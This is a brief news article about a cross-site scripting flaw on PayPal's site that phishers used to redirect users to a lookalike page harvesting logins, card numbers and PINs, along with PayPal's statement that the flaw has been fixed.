Netcraft recently reported on a flaw in the Paypal system that allowed phishers to exploit their website. The report explains how the fraudsters maliciously set about to deceive Paypal users through a cross-site scripting technique (XSS).

Paypal users met the exploited flaw on visiting the genuine site with a message that read, "Your account is currently disabled because we think it has been accessed by a third party. You will now be redirected to Resolution Center." After a slight delay the victim would be redirected to a third-party page that looked very similar to the Paypal site.

This new site would request the member to login using their normal Paypal identity and ask for the victim to enter other personal details. These included credit card numbers, social security details and PIN's.

Once Paypal became aware of the flaw they set about to remedy the situation and it has now been fixed.

"As soon as we became aware of this scheme, we changed some of the code on the PayPal Web site. So this scheme, or any scheme like it, can no longer be effective," Amanda Pires, a PayPal spokeswoman, said in an interview.

She also stated that Paypal was working with the Internet service provider that hosts the malicious site to get it shut down, and does not yet know how many people may have fallen victim to the scam.